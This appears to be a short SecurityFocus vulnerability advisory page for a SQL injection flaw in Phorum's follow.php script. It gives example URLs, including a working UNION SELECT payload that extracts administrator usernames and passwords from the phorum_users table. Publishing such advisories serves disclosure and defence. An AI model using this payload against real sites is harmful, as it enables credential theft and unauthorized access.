Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Phorum FOLLOW.PHP SQL Injection Vulnerability

Examples sufficient to exploit this vulnerability have been provided:

http://www.example.com/phorum5012/follow.php?forum_id=1&,f00=bar,1=waraxe
http://www.example.com/phorum5012/follow.php?forum_id=1&thread=waraxe
http://www.example.com/phorum5012/follow.php?forum_id=1&,f00=bar,1=-99%20UNION%20ALL%20SELECT%201%2c1%2c1%2c1%2c1%2cCONCAT(username%2c%27|%27%2cpassword)%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%2c1%20FROM%20phorum_users%20WHERE%20admin=1







 

Privacy Statement
Copyright 2009, SecurityFocus